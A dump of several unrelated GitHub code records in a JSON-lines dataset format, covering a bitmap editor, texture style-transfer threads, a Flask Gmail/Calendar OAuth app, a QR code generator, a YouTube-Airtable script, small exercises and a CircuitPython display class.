file.askopenfilename(defaultextension=\".bmf\", filetypes=((\"BitMap File\", '*.bmf'),\n (\"Text File\", \"*.txt\"),\n (\"All Files\", \"*.*\")))\n if self.file:\n read = open(self.file, \"rb\")\n if int.from_bytes(read.read(1), \"big\") == 1:\n self.ProjectSize.set(1)\n else:\n self.ProjectSize.set(0)\n\n self.File_Label.config(text=\"File: {0}\\nDetected Size: {1}x{2}\".\n format(os.path.basename(self.file), 8, (self.ProjectSize.get() + 1) * 8))\n\n read.close()\n else:\n self.File_Label.config(text=\"File: None\\nNew Blank File\")\n self.file = None\n\n\nif __name__ == \"__main__\":\n selector = StartupDialog()\n selector.config(bg=\"#FFFFFF\")\n selector.title(\"Project Selector\")\n selector.resizable(False, False)\n selector.mainloop()\n\n if not selector.closed:\n main = Main(mode=selector.ProjectSize.get(), carry_file=selector.file) # Mode: 0 = 8x8 | 1 = 8x16\n main.resizable(False, False)\n main.title(\"Bitmap Editor\")\n main.mainloop()\n","repo_name":"0xMAC8205/Character-Bitmap-Editor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":35259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"25193770276","text":"home_page_location = \"/\"\npage_2_location = \"/page-2\"\npage_3_location = \"/page-3\"\n\nTIMEOUT = 60\n\ngraphs_list = [\n {\n \"title\": \"Battery SOC\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"bs\"\n },\n {\n \"title\": \"Pedal Angle\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"bp\"\n },\n {\n \"title\": \"GPS\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"gps\"\n },\n {\n \"title\": \"XYZ Linear Acceleration\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"xyzla\"\n },\n {\n \"title\": \"XYZ Gyroscope\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"xyzg\"\n },\n {\n \"title\": \"Battery Temperature\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"BT\"\n },\n {\n \"title\": \"Battery Voltage\",\n \"X\": 0,\n \"Y\": 0,\n \"data_key\": \"BV\"\n }\n] ","repo_name":"sfuphantom/Wireless","sub_path":"frontend/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"19049985031","text":"\nfrom PyQt5 import QtWidgets,QtCore\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog, QMenu, QMessageBox , QListWidgetItem\nfrom PyQt5.QtCore import pyqtSignal, QThread, Qt, QUrl, QPoint,QSize,QRect\nimport os\nimport time\nimport InfoNotifier\nfrom PIL import Image\nimport cv2\nimport glob\nfrom Gen_Style import style_transfer\nimport gen_jpg_tga_from_dds\nimport json\nimport gen_lerp_ret\nfrom path_util import PathUtils\nfrom button_state import GlobalConfig\n\n# tab3\nclass MyGenDdsJpgThreadTabPics(QThread):\n _signal = pyqtSignal()\n\n def __init__(self):\n super(MyGenDdsJpgThreadTabPics, self).__init__()\n self.exe_dir = os.getcwd() + \"\\\\dds_to_jpg/dds_to_jpg.exe\"\n self.show_list = []\n self.project_base = ''\n\n def set_para(self, content_list=None, project_base=''):\n if content_list is None:\n self.show_list = []\n self.show_list = content_list\n self.project_base = project_base\n\n def gen_jpg(self):\n try:\n InfoNotifier.InfoNotifier.g_progress_info.append(\"开始将贴图格式转换为jpg和tga····\")\n\n gen_jpg_tga_from_dds.gen_jpg_tga(work_=self.project_base, dds_list=self.show_list)\n InfoNotifier.InfoNotifier.g_progress_info.append(\"已生成jpg,tga格式图片\")\n self._signal.emit()\n except BaseException as e:\n print(e)\n\n def run(self):\n 
self.gen_jpg()\n\n\nclass MyGenStyleTempThreadTabPics(QThread):\n _signal = pyqtSignal()\n\n def __init__(self):\n super(MyGenStyleTempThreadTabPics, self).__init__()\n self.show_list = None\n self.chosen_style_pic = ''\n self.temp_file_name = ''\n\n def set_para(self, show_list=None, chosen_style_pic='', temp_file=''):\n if show_list is None:\n self.show_list = []\n self.show_list = show_list\n self.chosen_style_pic = chosen_style_pic\n self.temp_file_name = temp_file\n\n def gen_style(self):\n GlobalConfig.b_sync_block_in_thread_temp = True\n QApplication.processEvents()\n style_pic = self.chosen_style_pic\n content_list = self.show_list\n style_name = os.path.basename(style_pic).split('.')[0]\n if os.path.exists(self.temp_file_name) is False:\n os.makedirs(self.temp_file_name)\n\n \"\"\"让生成过的临时文件不再重新生成\"\"\"\n flag = True\n for i in range(len(content_list)):\n file_name = os.path.basename(content_list[i])\n if os.path.exists(self.temp_file_name + style_name + '/' + file_name) is False:\n flag = False\n break\n # style_main3(content_list, style_pic, self.temp_file_name)\n if flag is False:\n style_transfer.style_main_temp(content_list, style_pic)\n InfoNotifier.InfoNotifier.g_progress_info.append(\"完成,点击一张原图进行预览,并滑动微调栏杆调整插值参数\")\n GlobalConfig.b_sync_block_in_thread_temp = False\n self._signal.emit()\n\n def run(self):\n self.gen_style()\n\n\nclass MyGenStyleThreadTabPics(QThread):\n _signal = pyqtSignal()\n\n def __init__(self):\n super(MyGenStyleThreadTabPics, self).__init__()\n self.texconv_path = os.getcwd() + \"/texconv.exe\"\n self.project_base = ''\n self.content_list = []\n self.chosen_style_pic = ''\n self.lerg_value = 50\n\n def set_para(self, project_base='', content_list=None, style_path='', lerg_value=50):\n if content_list is None:\n self.content_list = []\n self.project_base = project_base\n self.content_list = content_list\n self.chosen_style_pic = style_path\n self.lerg_value = lerg_value\n\n def save_all(self):\n GlobalConfig.b_sync_block_op_in_progress = True\n QApplication.processEvents()\n InfoNotifier.InfoNotifier.g_progress_info.append(\"开始保存图片··············\")\n # gen_style_batch3.style_main3(self.content_list,self.chosen_style_pic)\n style_transfer.style_main(self.content_list, self.chosen_style_pic, self.project_base, False)\n for file in self.content_list:\n file_name = os.path.basename(file)\n get_path = PathUtils(self.project_base, self.chosen_style_pic, file)\n jpg_path = get_path.dds_to_jpg_path()\n tga_path = get_path.dds_to_tga_path()\n\n # lerp\n style_out_pic_path = get_path.get_style_path()\n if os.path.exists(style_out_pic_path) is False:\n InfoNotifier.InfoNotifier.g_progress_info.append(f\"不存在对应风格化图片{style_out_pic_path}。跳过本张图片\")\n continue\n lerp_out_path = get_path.get_jpg_lerp_path()\n if os.path.exists(os.path.dirname(lerp_out_path)) is False:\n os.makedirs(os.path.dirname(lerp_out_path))\n lerp_ret, _ = gen_lerp_ret.lerp_img(jpg_path, style_out_pic_path, self.lerg_value)\n gen_lerp_ret.write_img(lerp_ret, lerp_out_path)\n # combine alpha c\n tga_img = Image.open(tga_path)\n jpg_img = Image.open(lerp_out_path)\n ir_tmp, ig_tmp, ib_tmp, ia = tga_img.split()\n ir, ig, ib = jpg_img.split()\n tga_img = Image.merge('RGBA', (ir, ig, ib, ia))\n lerp_out_path = lerp_out_path.replace(\".jpg\", \".tga\")\n tga_img.save(lerp_out_path, quality=100)\n print(f\"generate tga image {lerp_out_path} after lerp op.\")\n InfoNotifier.InfoNotifier.g_progress_info.append(f\"生成插值操作后的tga图片: {lerp_out_path} \")\n # dds\n # 图片目录路径\n dds_out = 
get_path.get_dds_output_path()\n if os.path.exists(dds_out) is False:\n os.makedirs(dds_out)\n main_cmd = f\"{self.texconv_path} -dxt5 -file {lerp_out_path} -outdir {dds_out}\"\n main_cmd.replace(\"\\n\", \"\")\n os.system(main_cmd)\n InfoNotifier.InfoNotifier.g_progress_info.append('生成DDS贴图:' + dds_out + file_name)\n InfoNotifier.InfoNotifier.g_progress_info.append(\"保存完成\")\n GlobalConfig.b_sync_block_op_in_progress = False\n self._signal.emit()\n\n def run(self):\n self.save_all()\n\n\nclass MyGenSeamlessStyleThreadTabPics(QThread):\n _signal = pyqtSignal()\n\n def __init__(self):\n super(MyGenSeamlessStyleThreadTabPics, self).__init__()\n self.texconv_path = os.getcwd() + \"/texconv.exe\"\n self.project_base = ''\n self.content_list = []\n self.chosen_style_pic = ''\n self.lerg_value = 50\n\n def set_para(self, project_base='', content_list=None, style_path='', lerg_value=50):\n if content_list is None:\n self.content_list = []\n self.project_base = project_base\n self.content_list = content_list\n self.chosen_style_pic = style_path\n self.lerg_value = lerg_value\n\n def expanded(self):\n InfoNotifier.InfoNotifier.g_progress_info.append(\"开始保存图片··············\")\n GlobalConfig.b_sync_block_op_in_progress = True\n QApplication.processEvents()\n pad = 256\n for file in self.content_list:\n get_path = PathUtils(self.project_base, self.chosen_style_pic, file)\n\n jpg_path = get_path.dds_to_jpg_path()\n tga_path = get_path.dds_to_tga_path()\n expanded_jpg = get_path.get_expanded_jpg_path()\n expanded_tga = get_path.get_expanded_tga_path()\n # expand\n img_jpg = Image.open(jpg_path)\n img_tga = Image.open(tga_path)\n width = img_jpg.width\n height = img_jpg.height\n assert width == img_tga.width and height == img_tga.height\n\n img_jpg_pad = Image.new(\"RGB\", (width * 3, height * 3))\n img_tga_pad = Image.new(\"RGBA\", (width * 3, height * 3))\n for i in range(3):\n for j in range(3):\n img_jpg_pad.paste(img_jpg, (i * width, j * height, (i + 1) * width, (j + 1) * height))\n img_tga_pad.paste(img_tga, (i * width, j * height, (i + 1) * width, (j + 1) * height))\n img_jpg_crop = img_jpg_pad.crop((width - pad, height - pad, 2 * width + pad, 2 * height + pad))\n if os.path.exists(os.path.dirname(expanded_jpg)) is False:\n os.makedirs(os.path.dirname(expanded_jpg))\n img_jpg_crop.save(expanded_jpg, quality=100)\n print(expanded_jpg)\n img_tga_crop = img_tga_pad.crop((width - pad, height - pad, 2 * width + pad, 2 * height + pad))\n img_tga_crop.save(expanded_tga, quality=100)\n print(expanded_tga)\n InfoNotifier.InfoNotifier.g_progress_info.append(f'保存expand后图片:{expanded_jpg},jpg')\n\n def save_all(self):\n # gen_seamless_style_batch3.style_main3(self.content_list,self.chosen_style_pic)\n style_transfer.style_main(self.content_list, self.chosen_style_pic, self.project_base, True)\n for file in self.content_list:\n file = file.replace(\"\\n\", \"\")\n file_name = os.path.basename(file)\n\n get_path = PathUtils(self.project_base, self.chosen_style_pic, file)\n jpg_path = get_path.get_expanded_jpg_path()\n tga_path = get_path.get_expanded_tga_path()\n\n tmp_style_in = jpg_path\n\n # lerp\n style_out_pic_path = get_path.get_expanded_style_path()\n\n if os.path.exists(style_out_pic_path) is False:\n InfoNotifier.InfoNotifier.g_progress_info.append(f\"不存在对应风格化图片{style_out_pic_path}。跳过本张图片\")\n continue\n lerp_out_path = get_path.get_expanded_lerp_path_jpg()\n if os.path.exists(os.path.dirname(lerp_out_path)) is False:\n os.makedirs(os.path.dirname(lerp_out_path))\n lerp_ret, _ = 
gen_lerp_ret.lerp_img(tmp_style_in, style_out_pic_path, self.lerg_value)\n gen_lerp_ret.write_img(lerp_ret, lerp_out_path)\n # combine alpha c\n tga_img = Image.open(tga_path)\n jpg_img = Image.open(lerp_out_path)\n ir_tmp, ig_tmp, ib_tmp, ia = tga_img.split()\n ir, ig, ib = jpg_img.split()\n tga_img = Image.merge('RGBA', (ir, ig, ib, ia))\n lerp_out_path = lerp_out_path.replace(\".jpg\", \".tga\")\n tga_img.save(lerp_out_path, quality=100)\n print(f\"generate tga image {lerp_out_path} after lerp op.\")\n InfoNotifier.InfoNotifier.g_progress_info.append(f\"生成插值操作后的tga图片 {lerp_out_path} \")\n # seamless\n seamless_path = get_path.get_seamless_path()\n if os.path.exists(os.path.dirname(seamless_path)) is False:\n os.makedirs(os.path.dirname(seamless_path))\n img = Image.open(get_path.get_expanded_tga_path())\n width = img.width\n height = img.height\n pad = 256\n img_crop = img.crop((pad, pad, width - pad, height - pad))\n img_crop.save(seamless_path, quality=100)\n InfoNotifier.InfoNotifier.g_progress_info.append(\"生成无缝贴图:\" + seamless_path)\n dds_output = get_path.get_dds_output_path()\n if os.path.exists(dds_output) is False:\n os.makedirs(dds_output)\n main_cmd = f\"{self.texconv_path} -dxt5 -file {seamless_path} -outdir {dds_output}\"\n main_cmd.replace(\"\\n\", \"\")\n os.system(main_cmd)\n InfoNotifier.InfoNotifier.g_progress_info.append('生成DDS贴图:' + dds_output + file_name)\n\n InfoNotifier.InfoNotifier.g_progress_info.append(\"保存完成\")\n GlobalConfig.b_sync_block_op_in_progress = False\n self._signal.emit()\n\n def run(self):\n self.expanded()\n self.save_all()","repo_name":"ssh198811/style_swaper","sub_path":"sub_threads/tab_specific_pics_thread.py","file_name":"tab_specific_pics_thread.py","file_ext":"py","file_size_in_byte":11918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71788119639","text":"\r\n''' Let a user compare two letters and\r\nevaluate whether one occurs before\r\nthe other in the english alphabet'''\r\n\r\nfirst_letter = input(\"Input a letter: \")\r\nsecond_letter = input(\"Input another letter: \")\r\n\r\nif first_letter < second_letter:\r\n print(\"First letter comes before second\")\r\nelif first_letter > second_letter:\r\n print(\"Second letter comes before first\")\r\nelse:\r\n print(\"The letters are in equal position\")\r\n","repo_name":"Japhet09/BI","sub_path":"Python&R/lecture4/lecture_4_script_solutions/lecture_4_5.py","file_name":"lecture_4_5.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12684718659","text":"from flask import Flask, flash, redirect, render_template, request, session, url_for\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom werkzeug.exceptions import default_exceptions\nfrom werkzeug.security import check_password_hash, generate_password_hash\n\n# Import functions from helpers.py file\nfrom helpers import *\n\n\n# This variable specifies the name of a file that contains the OAuth 2.0\n# information for this application, including its client_id and client_secret.\nCLIENT_SECRETS_FILE = \"client_secret.json\"\n\n# This OAuth 2.0 access scope (separate for gmail and calendar APIs) allows for full modify/write\n# access to the authenticated user's account and requires requests to use an SSL connection.\nSCOPES_GMAIL = 'https://www.googleapis.com/auth/gmail.modify'\nAPI_SERVICE_NAME_GMAIL = 'gmail'\nAPI_VERSION_GMAIL = 'v1'\n\nSCOPES_CAL = 
'https://www.googleapis.com/auth/calendar'\nAPI_SERVICE_NAME_CAL = 'calendar'\nAPI_VERSION_CAL = 'v3'\n\n\n# Configure application\napp = Flask(__name__)\n\napp.secret_key = 'II5l9oW0KmbyZgW88vzu'\n\n\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n # If no login creditionals are stored in the Flask session, ask user to authorize account\n if 'credentials' not in flask.session:\n return redirect('authorize-gmail')\n\n # If user is authorized, then parse Gmail account for events in new messages to add to the calendar\n else:\n parseGmail()\n\n # Redirect to the load-calendar page after done parsing\n return redirect(\"/load-calendar\")\n\n\n@app.route(\"/load-calendar\")\ndef load_calendar():\n # Obtain credentials from flask session to build calendar\n credentials = google.oauth2.credentials.Credentials(\n **flask.session['credentials'])\n cal = googleapiclient.discovery.build(\n API_SERVICE_NAME_CAL, API_VERSION_CAL, credentials=credentials)\n \n # Initialize allCalendars\n session[\"allCalendars\"] = listEvents(cal)\n\n # Initialize calendar view to week\n session[\"currView\"] = \"week\"\n\n # Initialize chosenCals to all indices in allCalendars\n session[\"chosenCals\"] = [i for i in range(len(session[\"allCalendars\"]))]\n\n # Redirect user to calendar\n return redirect(\"/calendar\")\n\n\n@app.route(\"/calendar\", methods=[\"GET\", \"POST\"])\ndef calendar():\n # Update view and currView\n view = request.args.get(\"view\")\n if not view:\n view = session[\"currView\"]\n else:\n session[\"currView\"] = view\n \n # Get indices of calendars as ints from checkboxes\n if request.method == 'POST':\n session[\"chosenCals\"] = [int(i) for i in request.form.getlist('filter')]\n \n # Make list of calendar names, codes, colors that the user wants to see\n chosenCals = [session[\"allCalendars\"][i] for i in session[\"chosenCals\"]]\n for cal in chosenCals:\n cal[1] = cal[1].replace(\"#\", \"%23\")\n\n # Render calendar page\n return render_template(\"calendar.html\", allCalendars=session[\"allCalendars\"], month=(True if view == \"month\" else False), \n agenda=(True if view == \"agenda\" else False), chosenCals=chosenCals, indices=session[\"chosenCals\"])\n \n\n# Authorization function from Gmail API\n@app.route('/authorize-gmail')\ndef authorize_gmail():\n # Create flow instance to manage the OAuth 2.0 Authorization Grant Flow steps.\n flow_gmail = google_auth_oauthlib.flow.Flow.from_client_secrets_file(\n CLIENT_SECRETS_FILE, scopes=SCOPES_GMAIL)\n\n flow_gmail.redirect_uri = flask.url_for('oauth2callback_gmail', _external=True)\n\n\n authorization_url_gmail, state_gmail = flow_gmail.authorization_url(\n # Enable offline access so that you can refresh an access token without\n # re-prompting the user for permission. Recommended for web server apps.\n access_type='offline',\n # Enable incremental authorization. 
Recommended as a best practice.\n include_granted_scopes='true')\n\n # Store the state so the callback can verify the auth server response.\n flask.session['state'] = state_gmail\n\n return redirect(authorization_url_gmail)\n\n# Authorization callback function from Gmail API\n@app.route('/oauth2callback-gmail')\ndef oauth2callback_gmail():\n # Specify the state when creating the flow in the callback so that it can\n # verified in the authorization server response.\n state = flask.session['state']\n\n flow = google_auth_oauthlib.flow.Flow.from_client_secrets_file(\n CLIENT_SECRETS_FILE, scopes=SCOPES_GMAIL, state=state)\n flow.redirect_uri = flask.url_for('oauth2callback_gmail', _external=True)\n\n # Use the authorization server's response to fetch the OAuth 2.0 tokens.\n authorization_response = flask.request.url\n flow.fetch_token(authorization_response=authorization_response)\n\n # Store credentials in the session.\n # ACTION ITEM: In a production app, you likely want to save these\n # credentials in a persistent database instead.\n credentials = flow.credentials\n flask.session['credentials'] = credentials_to_dict(credentials)\n\n return redirect(url_for('index'))\n\n\n# Authorization function from Google Calendar API\n@app.route('/authorize-cal')\ndef authorize_cal():\n # Create flow instance to manage the OAuth 2.0 Authorization Grant Flow steps.\n flow_cal = google_auth_oauthlib.flow.Flow.from_client_secrets_file(\n CLIENT_SECRETS_FILE, scopes=SCOPES_CAL)\n\n flow_cal.redirect_uri = flask.url_for('oauth2callback_cal', _external=True)\n\n authorization_url_cal, state_cal = flow_cal.authorization_url(\n # Enable offline access so that you can refresh an access token without\n # re-prompting the user for permission. Recommended for web server apps.\n access_type='offline',\n # Enable incremental authorization. 
Recommended as a best practice.\n include_granted_scopes='true')\n\n # Store the state so the callback can verify the auth server response.\n flask.session['state'] = state_cal\n\n return redirect(authorization_url_cal)\n\n\n#Authorization callback function from Google Calendar API\n@app.route('/oauth2callback-cal')\ndef oauth2callback_cal():\n # Specify the state when creating the flow in the callback so that it can\n # verified in the authorization server response.\n state = flask.session['state']\n\n flow = google_auth_oauthlib.flow.Flow.from_client_secrets_file(\n CLIENT_SECRETS_FILE, scopes=SCOPES_CAL, state=state)\n flow.redirect_uri = flask.url_for('oauth2callback_cal', _external=True)\n\n # Use the authorization server's response to fetch the OAuth 2.0 tokens.\n authorization_response = flask.request.url\n flow.fetch_token(authorization_response=authorization_response)\n\n # Store credentials in the session.\n # ACTION ITEM: In a production app, you likely want to save these\n # credentials in a persistent database instead.\n credentials = flow.credentials\n flask.session['credentials'] = credentials_to_dict(credentials)\n\n return redirect(url_for('index'))\n\n# Revoke creditentials from Flask session (from Google API documentation)\n@app.route('/revoke')\ndef revoke():\n if 'credentials' not in flask.session:\n return ('You need to authorize before ' +\n 'testing the code to revoke credentials.')\n\n credentials = google.oauth2.credentials.Credentials(\n **flask.session['credentials'])\n\n revoke = requests.post('https://accounts.google.com/o/oauth2/revoke',\n params={'token': credentials.token},\n headers = {'content-type': 'application/x-www-form-urlencoded'})\n\n status_code = getattr(revoke, 'status_code')\n if status_code == 200:\n return('Credentials successfully revoked.')\n else:\n return('An error occurred.')\n\n\n# Clear creditionals from Flask session (from Google API documentation)\n@app.route('/clear')\ndef clear_credentials():\n if 'credentials' in flask.session:\n del flask.session['credentials']\n return ('Credentials have been cleared.

')\n\n\ndef main():\n return redirect(\"/\")\n\n\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"vli1721/hcal","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34819268065","text":"import qrcode\nfrom PIL import Image\n\n\nqr = qrcode.QRCode(\n version=1,\n error_correction=qrcode.constants.ERROR_CORRECT_L,\n box_size=10,\n border=4,\n)\ndef logo_resize():\n # Image source\n logo_source = '/home/michal/Workspace/qr-code-encoder/Token.png'\n logo = Image.open(logo_source)\n\n # Logo size adjustment \n new_logo = logo.resize((50, 50))\n return new_logo\n\ndef set_colors():\n # Set colors for image\n QRcolor = \"Black\"\n BGcolor = \"White\"\n return QRcolor, BGcolor\n\ndef create_qr(QRcontent, QRcolor, BGcolor, new_logo):\n # Data that will be encoded \n data = QRcontent\n\n # Add data to create QR Code\n qr.add_data(data)\n QR_Image = qr.make_image(fill_color=QRcolor, back_color=BGcolor)\n\n # Position the logo\n pos = ((QR_Image.size[0] - new_logo.size[0]) // 2,\n (QR_Image.size[1] - new_logo.size[1]) // 2)\n QR_Image.paste(new_logo, pos)\n # Save the Image\n QR_Image.save(\"/home/michal/Workspace/qr-code-encoder/Generated-QR-Code.png\")\n return QR_Image\n\ndef generate_qrcode(QRcontent):\n new_logo = logo_resize()\n QRcolor, BGcolor = set_colors()\n print('QR code generated!')\n return create_qr(QRcontent, QRcolor, BGcolor, new_logo)\n\ngenerate_qrcode(\"https://www.youtube.com/watch?v=nmb_831Io7w\")","repo_name":"SwidzinskiMichal/QR-Code-Encoder","sub_path":"QRgenerator.py","file_name":"QRgenerator.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"20498022798","text":"from tkinter import *\r\nfrom PIL import Image\r\n\r\nroot = Tk()\r\nroot.title('Image')\r\nroot.iconbitmap('D:\\Programowanie\\WorkspacePython\\windows_logo.jpg')\r\n\r\nmy_img = Image.open(\"windows_logo.jpg\")\r\n\r\nbutton_quit = Button(root, text=\"Exit Program\", command=root.quit)\r\nbutton_quit.pack()\r\n\r\nroot.mainloop()","repo_name":"michal125/PythonProjects","sub_path":"images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30135429302","text":"import os\nfrom dotenv import load_dotenv\nfrom typing import List\nfrom dataclasses import dataclass\nfrom pyairtable.api.table import Table\nfrom googleapiclient.discovery import build\n\n\nload_dotenv()\nYOUTUBE_API_KEY = os.getenv('YOUTUBE_API_KEY', \"\")\nAIRTABLE_API_KEY = os.getenv('AIRTABLE_API_KEY', \"\")\nAIRTABLE_BASE_ID = os.getenv('AIRTABLE_BASE_ID', \"\")\nYT_STATS_TABLE = os.getenv('YT_STATS_TABLE', \"\")\nBEST_PERFORMING_VIDEOS_TABLE = os.getenv('BEST_PERFORMING_VIDEOS_TABLE', \"\")\n\n\n@dataclass\nclass BestPerformingVideos:\n video_count: int \n\n\n def __get_most_viewed_videos(self, channel_id: str) -> list:\n youtube = build('youtube', 'v3', developerKey=YOUTUBE_API_KEY)\n search_response = youtube.search().list(\n channelId=channel_id,\n type='video',\n part='id,snippet',\n order='viewCount',\n maxResults=self.video_count\n ).execute()\n videos = []\n for search_result in search_response.get('items', []):\n video_id = search_result['id']['videoId']\n video = {\n 'title': search_result['snippet']['title'],\n 'video_id': video_id\n }\n videos.append(video)\n return 
videos\n \n\n def __create_records(self, videos: List[dict], channel_name: str):\n airtable = Table(AIRTABLE_API_KEY, AIRTABLE_BASE_ID, BEST_PERFORMING_VIDEOS_TABLE)\n for video in videos:\n print(\"Inserting video: \" + video['title'] + \" for channel: \" + channel_name)\n record = {\n 'Title': video['title'],\n 'Video ID': video['video_id'],\n 'YT Channel': channel_name\n }\n airtable.create(record)\n\n \n def generate(self):\n table = Table(AIRTABLE_API_KEY, AIRTABLE_BASE_ID, YT_STATS_TABLE)\n for record in table.all():\n channel_id = record['fields']['ChannelID']\n channel_name = record['fields']['Channel Name']\n videos = self.__get_most_viewed_videos(channel_id)\n self.__create_records(videos, channel_name)","repo_name":"GeneralDido/airtable_video_recommendations","sub_path":"src/best_performing_videos.py","file_name":"best_performing_videos.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"489619874","text":"import gspread\nimport os.path\nimport sys\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport pprint\n\nclient_secret = 'client-secret.json'\n\ndef get_client():\n scope = ['https://spreadsheets.google.com/feeds',\n 'https://www.googleapis.com/auth/drive']\n creds = ServiceAccountCredentials.from_json_keyfile_name(client_secret, scope)\n client = gspread.authorize(creds)\n\n return client\n\ndef get_all(sheet):\n results = sheet.get_all_records()\n return results\n\ndef main():\n if not os.path.isfile(client_secret):\n print('Client secret not found. Create one here: https://console.developers.google.com/apis')\n sys.exit(1)\n\n client = get_client()\n sheet = client.open('grocery_list').sheet1\n\n results = get_all(sheet)\n pp = pprint.PrettyPrinter()\n pp.pprint(results)\n\n #last_id = results[-1].get('id')\n last_id = 0\n sheet.insert_row([(int(last_id) + 1), 1, 'food', 'Mango'], len(results) + 2)\n\nif __name__ == '__main__':\n main()","repo_name":"kelvinwop/gdocs-db-template","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71556301077","text":"import numpy as np\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nfrom data.ej3_digitos_ruido import DATA_DIGITOS_RUIDO_SHOW\n\nmatrices = [np.fliplr(np.array(matrix)[::-1].reshape(7,5)) for matrix, _ in DATA_DIGITOS_RUIDO_SHOW]\n\nnum_cols = len(matrices)\n\nfig = make_subplots(rows = 1, cols = num_cols, subplot_titles=[f'' for i in range(len(matrices))])\n\ntraces = []\nfor i, matrix in enumerate(matrices):\n heatmap = go.Heatmap(z=matrix, colorscale=[[0, 'white'], [1, 'black']])\n row = 1\n cols = (i % num_cols) + 1\n fig.add_trace(heatmap, row = row, col = cols)\n\nfig.update_layout(\n title=\"Number Heatmap\",\n xaxis=dict(title=\"X-axis\"),\n yaxis=dict(title=\"Y-axis\")\n)\n\nfig.show()\n","repo_name":"MatyManzur/sia-all-tps","sub_path":"sia-tp3/plots/numbers_plots.py","file_name":"numbers_plots.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14176649154","text":"import numpy as np\n\ndata = np.array([11, 22, 33, 44, 55])\ndata02 = np.array([[11, 22, 33, 44, 55],\n [11, 22, 33, 44, 55]])\nmethod = input()\n\nif method == 'col':\n data = data.reshape((1, data.shape[0]))\nelif method == 'row':\n data = 
data.reshape((data.shape[0], 1))\n\nprint(data)\nprint(data02)\ndataT =data02.T\nprint(dataT)","repo_name":"AbdellrahmanAhmed/AMIT_ML_AI_Diploma","sub_path":"note session 07/main07.py","file_name":"main07.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1553444939","text":"def englishize_word(word):\n \"\"\"englishizes word\"\"\"\n suffix = word[-4:]\n if suffix[0] == 'b' and word[0] in 'aeiou':\n return f'(b{word[:-4]} or {word[:-4]})'\n else:\n return word[-4] + word[:-4]\n\n\ndef englishize_sentence(sentence):\n \"\"\"englishizes sentence\"\"\"\n words = sentence.split()\n english_words = [englishize_word(word) for word in words]\n return ' '.join(english_words)\n\n\nsentence = \"onuzz hankyoutuzz ibuzz ambuzz allergicbuzz otuzz eggsbuzz\"\nenglish = englishize_sentence(sentence)\nprint(english)","repo_name":"llamington/COSC121","sub_path":"superquiz_2_2.py","file_name":"superquiz_2_2.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73607949077","text":"__version__ = \"0.0.0-auto.0\"\n__repo__ = \"https://github.com/foamyguy/Circuitpython_CircuitPython_Display_Frame.git\"\n\nimport displayio\nimport terminalio\nfrom adafruit_display_text import bitmap_label\nfrom adafruit_display_shapes.roundrect import RoundRect\n\n\nclass Frame(displayio.Group):\n # pylint: disable=too-many-arguments,too-many-locals\n \"\"\"\n A rounded rectangle frame with a text label at the top center.\n\n :param int x: The x-position of the top left corner.\n :param int y: The y-position of the top left corner.\n :param int width: The width of the rounded-corner rectangle.\n :param int height: The height of the rounded-corner rectangle.\n :param int corner_radius: The radius of the rounded corner.\n :param str text: Text to display\n :param Font font: A font class that has ``get_bounding_box`` and ``get_glyph``.\n Defaults to terminalio.FONT\n :param outline: The outline of the rounded-corner rectangle. Can be a hex value for a color.\n :param stroke: Used for the outline. 
